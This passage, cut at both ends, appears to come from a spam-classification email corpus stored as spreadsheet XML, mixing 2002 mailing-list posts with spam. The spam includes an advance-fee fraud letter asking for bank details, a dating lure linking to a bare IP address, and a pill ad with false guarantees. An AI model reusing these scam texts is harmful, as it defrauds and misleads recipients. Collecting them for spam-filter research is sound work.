 the necessary preparations to ensure a trouble free transaction.
  &lt;http://clrea.com&gt; 
 &lt;To be removed from this list click here
 &lt;http://www.practicaltechnology.net/epsform/AutoOptOut.cfm?address=cyphe
 rpunks@einstein.ssz.com&amp;campaign=28&gt;  
 ------=_NextPart_000_75206_01C230D5.32E68290
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;for home buyers&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html;"&gt;
 &lt;!-- Fireworks 4.0  Dreamweaver 4.0 target.  Created Thu May 16 19:54:49 =
 GMT-0700 (Pacific Daylight Time) 2002--&gt;
 &lt;style type=3D"text/css"&gt;
 &lt;!--
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#ffffff"&gt;
 &lt;table width=3D"500" border=3D"1" cellspacing=3D"0" align=3D"center" =
 cellpadding=3D"5"&gt;
   &lt;tr&gt;
     &lt;td valign=3D"middle"&gt;=20
       &lt;div align=3D"center"&gt;
         &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" =
 width=3D"500" align=3D"center"&gt;
           &lt;!-- fwtable fwsrc=3D"rebuyers.png" fwbase=3D"mailer2.gif" =
 fwstyle=3D"Dreamweaver" fwdocid =3D "742308039" fwnested=3D"1" --&gt;
           &lt;tr&gt;=20
             &lt;td colspan=3D"2"&gt;&lt;img name=3D"mailer2_r1_c1" =
 src=3D"http://www.clrea.com/emarketing/rebuyers/mailer2_r1_c1.gif" =
 width=3D"500" height=3D"124" border=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td valign=3D"top"&gt;=20
               &lt;p align=3D"left"&gt;&lt;img name=3D"mailer2_r2_c1" =
 src=3D"http://www.clrea.com/emarketing/rebuyers/mailer2_r2_c1.gif" =
 width=3D"174" height=3D"626" border=3D"0" =
 usemap=3D"#mailer2_r2_c1Map"&gt;&lt;/p&gt;
               &lt;p align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;&lt;b&gt;&lt;a =
 href=3D"http://www.clrea.com/whyusseller.cfm"&gt;&lt;font size=3D"3"&gt;Home=20
                 for Sale? &lt;br&gt;
                 List with us!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;td width=3D"313" height=3D"671" valign=3D"top"&gt;=20
               &lt;p&gt;&lt;b&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, =
 sans-serif"&gt;Buying=20
                 a home is an important step in your life and quite =
 possibly the=20
                 largest purchase you will ever make. A trustworthy and =
 reliable=20
                 agent is what you're looking for but often times it can =
 be difficult=20
                 to find a real estate agent deserving of your =
 trust.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, =
 sans-serif"&gt;Through recommendations=20
                 and client evaluations we've assembled a national =
 association=20
                 of &lt;a href=3D"http://www.clrea.com/philosophy.cfm" =
 onFocus=3D"if(this.blur)this.blur()"&gt;Christian=20
                 Real Estate Agents&lt;/a&gt; dedicated to fair business =
 practices and=20
                 the teachings of our savior.&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Christian=20
                 Agents&lt;/b&gt; - &lt;a =
 href=3D"http://www.clrea.com/assbenefits.cfm"&gt;click=20
                 here to join the association&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, =
 sans-serif"&gt;&lt;b&gt;Follow=20
                 these &lt;a href=3D"http://www.clrea.com/howworkbuyers.cfm" =
 onFocus=3D"if(this.blur)this.blur()"&gt;easy=20
                 steps&lt;/a&gt; and we'll take care of the =
 rest...&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size=3D"3" face=3D"Times New Roman, Times, =
 serif"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#0000FF"&gt;1&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;.&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;=20
                 Describe the property you are looking using our &lt;a =
 href=3D"http://www.clrea.com/buyersform.cfm" =
 onFocus=3D"if(this.blur)this.blur()"&gt;&lt;b&gt;Buyer's=20
                 Information Form&lt;/b&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, =
 sans-serif"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#0000FF"&gt;2&lt;/font&gt;.&lt;/b&gt;=20
                 Our Christian Living Real Estate Associate Agent =
 contacts you=20
                 at your convenience to get a better understanding of =
 your specific=20
                 real estate needs.&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, =
 sans-serif"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#0000FF"&gt;3&lt;/font&gt;.&lt;/b&gt;=20
                 Our Christian Living Real Estate Associate Agent =
 suggests properties=20
                 that fit your criteria and arranges for you to view the =
 properties=20
                 that interest you.&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, =
 sans-serif"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#0000FF"&gt;4&lt;/font&gt;.&lt;/b&gt;=20
                 During the decision making process, our Associate =
 Christian Agent=20
                 provides reliable and honest guidance to get you the =
 best possible=20
                 deal.&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, =
 sans-serif"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#0000FF"&gt;5&lt;/font&gt;.&lt;/b&gt;=20
                 When you've decided on a property to purchase, our agent =
 makes=20
                 all the necessary preparations to ensure a trouble free =
 transaction.&lt;br&gt;
                 &lt;/font&gt;&lt;font size=3D"3" face=3D"Times New Roman, Times, =
 serif"&gt;&lt;br&gt;
                 &lt;a href=3D"http://clrea.com" =
 onFocus=3D"if(this.blur)this.blur()"&gt;&lt;img =
 src=3D"http://www.clrea.com/emarketing/rebuyers/button.gif" =
 width=3D"310" height=3D"59" border=3D"0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
        =20
         &lt;&lt;font color=3Dblack face=3DVerdana=20
             size=3D-2&gt;To be removed from this list &lt;a=20
             =
 href=3D"http://www.practicaltechnology.net/epsform/AutoOptOut.cfm?address=
 =3Dcypherpunks@einstein.ssz.com&amp;campaign=3D28"&gt;click=20
           here&lt;/a&gt;&lt;/font&gt; &lt;/div&gt;    &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;map name=3D"mailer2_r2_c1Map"&gt;
   &lt;area shape=3D"rect" coords=3D"13,456,159,505" =
 href=3D"http://www.clrea.com/fwhyusfinance.cfm?class=3D1" =
 onFocus=3D"if(this.blur)this.blur()"&gt;
 &lt;/map&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_75206_01C230D5.32E68290--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</si>
  <si>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[ILUG-Social] Re: [ILUG] Formatting a windows partition from Linux
</t>
  </si>
  <si>
    <t xml:space="preserve">Lacking in a  _____
 	     / ___ \
 	    / /   \_\
 	  _| |__
 	 |_   __| 
 	  _| |__
 	 |_   __|
 	   | |     __
 	    \ \___/ /
 	     \_____/  symbol on stupid solaris, I decided to fall back on good
 ole' slang (and being in Limerick, used the local).  Besides, the quid is
 no more :(
 But floppy discs are still quite cheep, aren't they?
 Paul, way to busy to be doing this.
 Sure wasn't it Niall Brady &lt;bradyn@maths.tcd.ie&gt; 
 sometime around Wed, 21 Aug 2002 16:01:39 +0100 said:
 &gt; On Wed, 21 Aug 2002 15:47:32 BST, Paul Askins said:
 &gt; &gt;
 &gt; &gt;Option 2, buy a floppy drive, they're only about 15 or 20 yoyos.
 &gt; 							   ^^^^^
 &gt;   ___  _   _ ___ ____  
 &gt;  / _ \| | | |_ _|  _ \ 
 &gt; | | | | | | || || | | |
 &gt; | |_| | |_| || || |_| |
 &gt;  \__\_\\___/|___|____/ 
 &gt; 
 &gt; [or at worst, squid :-)]
 &gt;                        
 &gt; -- 
 &gt; 	Niall
 &gt;
 -- 
 Paul Askins &lt;:)
 Email:  Paul Askins &lt;paul.askins@adbvdesign.analog.com&gt;
 The truth of a proposition has nothing to do with its credibility.  And
 vice versa.
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I'm a tad furry...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 Forwarded-by: newsletter@tvspy.com
 Excerpted: ShopTalk - September 13, 2002
 "I'm a tad furry, so animal rights issues come into play."
 	Robin Williams, telling Entertainment Weekly why he won't do
 	nude scenes in movies.
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Johnny U: Johnny Unitas was the National Football League's most valuable
 player twice - and he led Baltimore to victory in "Super Bowl Five."
 For those of you younger than 30: this WAS modern football.  The game
 was played on artificial turf. (Richard Burkard/
 http://www.Laughline.com)
 Announcement: How telling is it that the death of Johnny Unitas was
 announced by the Baltimore Ravens - and not the Colts, who now play in
 Indianapolis?  When the Colt owners moved out of Baltimore years ago,
 they apparently left all the history books behind. (Burkard)
 Dick Disappears: Vice President Dick Cheney remains at an undisclosed
 location.  The move is for security reasons.  The Bush Administration
 is trying to keep him at a safe distance from would-be subpoenas. (Alan
 Ray - http://www.araycomedy.com)
 Noelle Nabbed: Jeb Bush's daughter Noelle is in trouble with the law
 again.  When she was a child, her dad would read her favorite bedtime
 story.  Goldilocks and the Three Strikes. (Ray)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Are bad developer libraries the problem with M$ software?
</t>
  </si>
  <si>
    <t xml:space="preserve">No, you need to learn how declarations work in C.  You have specified
 testbuff as "an array of 1024 pointers to characters".  That means,
 you have allocated an array big enough to store 1024 pointers.  On
 most machines, that's 4 bytes per pointer, which indeed would give you
 4096.
 John
 On Fri, Nov 22, 2002 at 10:27:53PM +0500, Ali Saifullah Khan wrote:
 &gt; Here is a test done on the return of sizes by sizeof() using pointers.
 &gt; 
 &gt; #include &lt;iostream.h&gt;
 &gt; 
 &gt; int main(void) {
 &gt;  char *testbuff[1024];
 &gt; 
 &gt;  int len = sizeof(testbuff);
 &gt;  cout &lt;&lt; len &lt;&lt; "\n";
 &gt;  return 0;
 &gt; }
 &gt; 
 &gt; c:&gt;debug\testbuff
 &gt; 4096
 &gt; 
 &gt; The output from this is 4096 but infact it should be returning 1024.
 &gt; Apparently, using a pointer has multiplied the value of the original size of
 &gt; the testbuff[] buffer by the size of the " pointer " ?
 &gt; 
 &gt; char pointers have a size of 4 bytes.....as is shown when output is 4 bytes
 &gt; using " int len = sizeof((char*)testbuff); "
 &gt; 
 &gt; c:&gt;debug\testbuff
 &gt; 4
 &gt; 
 &gt; so sizeof is returning the size of the "first" entity passed to it, that
 &gt; being the size of the pointer. " * "
 &gt; 
 &gt; Whats confusing is when sizeof outputs the value for something like " char *
 &gt; testbuff[] "
 &gt; Here the macro seems to be multiplying the sizes of entities passed to it,
 &gt; by considering the first entity as the pointer denoted by the asterisk
 &gt; itself " * ", and then taking this value of 4 and multiplying it with the
 &gt; size of the buffer testbuff[] which is 1024, to produce an output of 4096.
 &gt; 
 &gt; Rather strange behaviour. ???
 &gt; ----- Original Message -----
 &gt; From: &lt;cdavison@nucleus.com&gt;
 &gt; To: &lt;secprog@securityfocus.com&gt;
 &gt; Cc: &lt;viega@securesoftware.com&gt;
 &gt; Sent: Tuesday, November 19, 2002 2:59 AM
 &gt; Subject: Re: Are bad developer libraries the problem with M$ software?
 &gt; 
 &gt; 
 &gt; &gt; ----- Original Message -----
 &gt; &gt; From: John Viega
 &gt; &gt; Sent: 11/18/2002 2:28:08 PM
 &gt; &gt; To: cdavison@nucleus.com
 &gt; &gt; Cc: secprog@securityfocus.com
 &gt; &gt; Subject: Re: Are bad developer libraries the problem with M$ software?
 &gt; &gt;
 &gt; &gt; &gt; strlen does not work, because he was trying to get at the ALLOCATED
 &gt; &gt; &gt; size of a buffer, not the actual size of the buffer.
 &gt; &gt;
 &gt; &gt; You're right. I was looking at the safe_strncpy code, and it looks like
 &gt; the author did use strlen.
 &gt; &gt;
 &gt; &gt; &gt; sizeof will return the size of the data type passed to it.  So if you
 &gt; &gt; &gt; declared mystr as char mystr[1024];, it will return as the original
 &gt; &gt; &gt; author wanted.
 &gt; &gt;
 &gt; &gt; It will not work with a char*, so if your strings are dynamically
 &gt; allocated, or passed to you as a pointer, these macros will not work.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CyberAge Dating - Invitation from Jenny
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Dear user,&lt;/p&gt;
 &lt;p&gt;CyberAge Dating Club is contacting you on behalf of Jenny.&lt;/p&gt;
 &lt;p&gt;You have been carefully chosen as a matching partner for the other party using 
   our advanced profile-matching system. We have determined that you do not currently 
   have an account with us and invite you to join. It's absolutely FREE and there's 
   no obligations or hidden charges. Come see for yourself and prepare to have 
   fun! &lt;/p&gt;
 &lt;p&gt;&lt;a href="http://80.71.66.102/easysexmatch2/index.html"&gt;Click here to Join 
   Now&lt;/a&gt; or simply disregard this request if you're not interested.&lt;/p&gt;
 &lt;p&gt;Sincerely yours,&lt;br&gt;
   CyberAge Dating Club Staff.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, Elias Sinderson wrote:
 --]Sorry, Karl, your confusing things. Thos is saying that selective
 --]breeding should be counted as genetic engineering, whereas you are
 --]extending his definition to include the attration that your parents felt...
 The grain is this.......
 Selective breeding, cross polinization, ie  is a MACROgenetic activites.
 Your dealing with big structures like whole sheep, plants, seed etc.
 Manipulating the actual DNA, protein sequences, etc etc is a MICROgenetic
 activity.
 MACROgenetic activites have decades on decades of testing...
 MICROgentic  activities DO NOT.
 You guys get the point yet, or do you want to play another round of
 Obscura Detalist Retardo?
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Razor2 error: can't find "new"
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Using Razor2 via SpamAssasin.
 System is Solaris 2.7, with qmail. Spamassassin run via user's procmail.
 All users who use SA have run razor-register.
 Razor2 is failing, and I can't find anything in the limited docs or on 
 google on it,
 and I'm hoping someone can help.
 The error (which doesn't prevent SA from working) is:
 Oct  2 06:38:22 sancho2 qmail: 1033565902.186041 delivery 4588: success: 
 razor2_check_skipped:_Bad_file_number_Can't_locate_object_m
 ethod_"new"_via_package_"Razor2::Client::Agent"_(perhaps_you_forgot_to_load_"Razor2::Client::Agent"?)_at_/usr/local/lib/perl5/site_p
 erl/5.6.1/Mail/SpamAssassin/Dns.pm_line_374./did_0+0+1/
 Looking at Dns.pm doesn't really help me, and Razor2::Client::Agent appears 
 to be in the right place,
 in /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client.
 Ideas?
 ...Chris
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Our Dumb Pipeline
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000640
 Date: 2002-10-06T21:28:33-06:00
 Ted Rall: My Government Went to Afghanistan and All I Got Was This Stupid 
 Pipeline[1] 
 Summary: The US begun planning courting the Taliban for permission to build an 
 oil pipeline since 1997. We even flew Mullah Omar to Texas to try and convince 
 him. After it was clear that wouldn't work, we threatened to bomb them and 
 begun attacking on a smaller scale for a year before 9-11. We already planned 
 to invade two months before the attacks. While it's not clear they knew about 
 9-11 it certainly provided a convenient cover for their plans. 
 Three days after we started bombing, we begun official work on the pipeline 
 Karzai, the Afghanistan president we installed (who incidentally used to work 
 for the oil company Unocal and was a former Talib) focused on the pipeline 
 rather than rebuilding his torn country. Yet, the entire pipeline is unworkable 
 because it's too expensive and will be sabotaged by warlords and Pakistan. 
 Bin Laden was essentially a venture capitalist: he funded attacks but didn't 
 carry them out. It's far more likely that an Egyptian group, Islamic Jihad, 
 carried out the attacks. If we wanted to stop the terrorists, we should have 
 gone after them. If we wanted to stop anti-Americanism, we should have gone 
 after Saudi Arabia and Pakistan. Instead, our bombing created the perfect 
 opportunity for Bin Laden to escape. Nor did we bother to stabilize 
 Afghanistan, the country is as ruined as ever. 
 "Unfortunately, our government seized the moment as well, not to do good or 
 right, but to take advantage--of our grief, of our naivete, of our lust for 
 justice and vengeance. They did it to line the pockets of themselves and their 
 friends, to gain political and economic advantage for a tiny coterie of 
 influential people. In doing so, they endangered the rest of us. They took 
 advantage of our ignorance about Islam, Caspian Sea oil and remote Central 
 Asia. I have faith that the fundamental goodness of the American people will 
 cause them to see what was done in their name, and to do something about it."
 [1] http://www.comicbookgalaxy.com/pipeline0.html
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_948625160P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Brent Welch &lt;welch@panasas.com&gt;
 &gt; Date:  Wed, 28 Aug 2002 22:40:21 -0700
 &gt;
 &gt; Well, I've used the check-the-modify-time cache trick for files in
 &gt; many places (not just exmh) so some part of me certainly thinks it
 &gt; is effective.  However, it occurred to me that if we do checkpoint
 &gt; state, then aren't we modifying the sequences file for the current
 &gt; folder on every message read?  Perhaps we look at the sequences file
 &gt; more than once per message view?  
 As I'd written the code a few months ago, we were reading the sequences file 
 first to see what sequences were in it and then once per sequence.  This 
 happens anywhere that we look at sequences, most notably in Ftoc_ShowSequences.
 That seemed to be an obvious lose performancewise, but I wanted my abstraction to 
 have a separate call for "what sequences are in this folder?" and "what 
 messages are in this sequence?".  One option would have been to add another 
 call to get the data off of disk, but I felt that the check-the-modify-time 
 technique would be less error-prone.
 I think the biggest gains would be from augmenting Ftoc_ShowSequences to allow 
 a finer specification of what needs to be updated in the ftoc so that the 
 current code would only be run when we really do have to update all sequences 
 for all messages.  I described these thoughts in an email message yesterday.
 And again, if it can wait a few weeks, I'm willing to do it.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_948625160P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9bijoK9b4h5R0IUIRApBEAJ9XB23cpckpVw7zWH/Uk1cG6rMCmQCfcNN9
 6I86NmGOWTSr1zajO3HHPnA=
 =sApX
 -----END PGP SIGNATURE-----
 --==_Exmh_948625160P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ATTN:
 I PRESUME THIS MAIL WILL NOT BE A SURPRISE TO YOU.
 I AM AN ACCOUNTANT WITH THE MINISTRY OF MINERAL
 RESOURCES AND ENERGY IN SOUTH AFRICA AND ALSO A MEMBER
 OF CONTRACTS AWARDING COMMITTEE OF THIS MINISTRY UNDER
 SOUTH AFRICA GOVERNMENT.
 MANY YEARS AGO, SOUTH AFRICA GOVERNMENT ASKED THIS
 COMMITTEE TO AWARDS CONTRACTS TO FOREIGN FIRMS, WHICH
 I AND 2 OF MY PARTNERS ARE THE LEADER OF THIS
 COMMITTEE, WITH OUR GOOD POSITION , THIS CONTRACRS
 WAS OVER INVOICED TO THE TUNE OF US$25,600,000:00 AS A
 DEAL TO BE BENEFIT BY THE THREE TOP MEMBER OF THIS
 COMMITTEE.
 NOW THE CONTRACTS VALUE HAS BEEN PAID OFF TO THE
 ACTUAL CONTRACTORS THAT EXECUTED THIS JOBS, ALL WE
 WANT NOW IS A TRUSTED FOREIGN PARTNER LIKE YOU THAT WE
 SHALL FRONT WITH HIS BANKING ACCOUNT NUMBER TO CLAIM
 THE OVER INFLATED SUM.
 UPON OUR AGREEMEENT TO CARRY ON THIS TRANSACTION WITH
 YOU, THE SAID FUND WILL BE SHARE AS FOLLOWS.
 75% WILL BE FOR US IN SOUTH AFRICA.
 20% FOR USING YOUR ACCOUNT AND OTHER CONTRIBUTION
 THAT MIGHT REQIURED FROM YOU.
 5% IS SET ASIDE FOR THE UP FRONT EXPENCES THAT
 WILL BE ENCOUNTER BY BOTH PARTY TO GET ALL NECESSARY
 DOCUMENTS AND FORMARLITIES THAT WILL JUSTIFY YOU AS
 THE RIGHTFUL OWNER OF THIS FUND.
 IF YOU ARE INTERESTED IN THIS TRANSACTION, KINDLY
 REPLY THIS MASSEGE WITH ALL YOUR PHONE AND FAX
 NUMBERS, TO ENABLE US FURNISH YOU WITH DETAILS AND
 PROCEDURES OF THIS TRANSACTION.
 GOD BLESS YOU
 YOURS FAITHFULLY.
 JOSEPH EDWARD.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Penis Enlargement Pills - 100% Guarantee Or Money Back
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (xcutieamandax@yahoo.com) on Tuesday, July 30, 2002 at 03:04:36
 ---------------------------------------------------------------------------
 : &lt;BODY BGCOLOR=#000000&gt;&lt;FONT COLOR=#ff8080&gt;"Want a &lt;FONT size=+1&gt;&lt;B&gt;BIG&lt;/FONT&gt;&lt;/B&gt; &lt;B&gt;Penis&lt;/B&gt;?" Experience the results you've always wanted &lt;BR&gt;with a massive scientific breakthrough:&lt;/p&gt;Our Doctor-Approved Pill Will Actually Expand, Lengthen And Enlarge &lt;BR&gt;Your Penis. 100% GUARANTEED! &lt;/p&gt;Best of all, There Are NO Agonizing Hanging Weights, NO Tough &lt;BR&gt;Exercises, NO Painful And Hard-To-Use Pumps, And There Is NO &lt;BR&gt;Dangerous Surgery Involved. &lt;/p&gt;We Guarantee genuine lasting results! Vig-Rx pills will work for &lt;BR&gt;you 100%, or you will get &lt;font size=+1&gt;&lt;B&gt;&lt;U&gt;100% of your money back!&lt;/B&gt;&lt;/U&gt;&lt;/p&gt;&lt;BR&gt;&lt;A HREF=www.adult-here.com/enlarge&gt;Click here to give it a try&lt;/A&gt;&lt;/FONT&gt;&lt;/p&gt;&lt;I&gt;"This is one of the best investments I have ever made. I can not &lt;BR&gt;even begin to express how much gratitude I have for this product. I &lt;BR&gt;am not even through with my first bottle and have already grown 1 &lt;BR&gt;in. in length and just over 1 in. in girth, and I still have another bottle to go! No more am I the average 6 inch guy
 ---------------------------------------------------------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cosmic crash of speeding jets tracked
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8553541,1440/
 Date: Not supplied
 A collision is seen from start to finish for the first time - it may provide 
 clues to how the Universe's largest single objects are formed
</t>
  </si>
  <si>
    <t xml:space="preserve">At 10:12 AM -0700 8/13/02, Patrick wrote:
 &gt;On Tue, 13 Aug 2002, Justin Shore wrote:
 &gt;
 &gt;&gt;  I'm assuming I need to strip the SpamAssassinReport.txt attachments
 &gt;&gt;  from my spam mailbox before I run the mailbox through razor-report,
 &gt;&gt;  correct?  Does anyone know of an easy way to do this?
 &gt;
 &gt;man spamassassin
 Whoops.  Sorry 'bout that.  Didn't think to check spamassassin's man page.
 -- 
 --
 Justin Shore, ES-SS ES-SSR      Pittsburg State University
 Network &amp; Systems Manager       Kelce 157Q
 Office of Information Systems   Pittsburg, KS 66762
 Voice: (620) 235-4606           Fax: (620) 235-4545
 http://www.pittstate.edu/ois/
 Warning:  This message has been quadruple Rot13'ed for your protection.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</si>
  <si>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nokia cell users 24128644332
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;table width="350" border="0" cellspacing="0" cellpadding="0" align=center&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
               &lt;font face=verdana size=+2&gt;&lt;b&gt; &lt;center&gt;Take yourself out of our list &lt;a href=http://freesite010.merchantnet.biz/remove.html&gt;&lt;font color=green&gt;BY CLICKING HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/center&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
 &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#FF0000" size="6"&gt;BORED 
               WITH &lt;br&gt;
               YOUR CELL PHONE?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
               &lt;/font&gt;&lt;/b&gt;
               &lt;table width="335" border="0" cellspacing="3" cellpadding="0" bgcolor="#0000CC"&gt;
                 &lt;tr&gt; 
                   &lt;td bgcolor="#FFFF00" bordercolor="#FFFFFF"&gt; 
                     &lt;div align="center"&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149;&lt;br&gt;
                       &lt;/font&gt;&lt;/b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;Get 
                       cool Songs &amp;amp; Logos to your Phone today!&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
               &lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#9900FF" size="2"&gt;&amp;nbsp;&lt;b&gt;&amp;nbsp;It's 
               real simple! No confusing downloads &lt;br&gt;
               or installations.Simple phone activation!&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://freesite010.merchantnet.biz/index.html"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font size="4" color="#00FF00"&gt;&amp;#149; 
               &amp;#149; &amp;#149; &lt;/font&gt;&lt;font size="4"&gt;Click Here to order&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;a href="http://freesite010.merchantnet.biz/index.html"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font size="4" color="#00FF00"&gt; 
               &amp;#149; &amp;#149; &amp;#149; &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;There 
               are tons of songs and graphics to choose from.&lt;br&gt;
               See a sample of some of the songs to choose from below:&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
